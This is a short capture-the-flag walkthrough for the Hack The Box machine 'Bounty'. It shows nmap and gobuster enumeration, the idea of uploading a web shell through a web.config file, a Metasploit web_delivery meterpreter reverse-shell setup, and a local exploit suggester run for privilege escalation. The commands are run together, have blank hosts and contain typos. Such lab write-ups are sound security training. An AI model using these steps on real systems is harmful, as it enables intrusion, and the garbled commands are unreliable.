Hack The Box: Bounty

Difficulty: Eazy Machine Creator: mrb3n Tools Used:

NMAP Gobuster Metasploit

Task: To find User.txt and Root.txt

Network Enumeration

Let’s start with a simple NMAP scan to discover open ports and services.

nmap -A


Using Gobuster, we can perform a directory scan. This host is a windows IIS server so we can add the extensions of .aspx,.html.

gobuster -u -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40 -x .aspx,.html

Remote Code Execution (RCE)


Since we can upload a web.config file, we should be able to upload a web shell in the config file.


Web Delivery Meterperter Shell

We need to build our exploit from Metasploit using the web delivery script.

msf use exploit/multi/script/web_deliverymsf exploit(multi/script/web_delivery) set srvhost exploit(multi/script/web_delivery) set target 2msf exploit(multi/script/web_delivery) set payload window/x64/meterpreter/reverse_tcpmsf exploit(multi/script/web_delivery) set lhost exploit(multi/script/web_delivery) run

Meterperter Shell


Privilege Escalation

Now we need to get system level session to get the root.txt we can use the recon local_exploit_suggester module in Metasploit.

msf use post/multi/recon/local_exploit_suggester msf set session 2 msf run

Privilege Escalation Exploit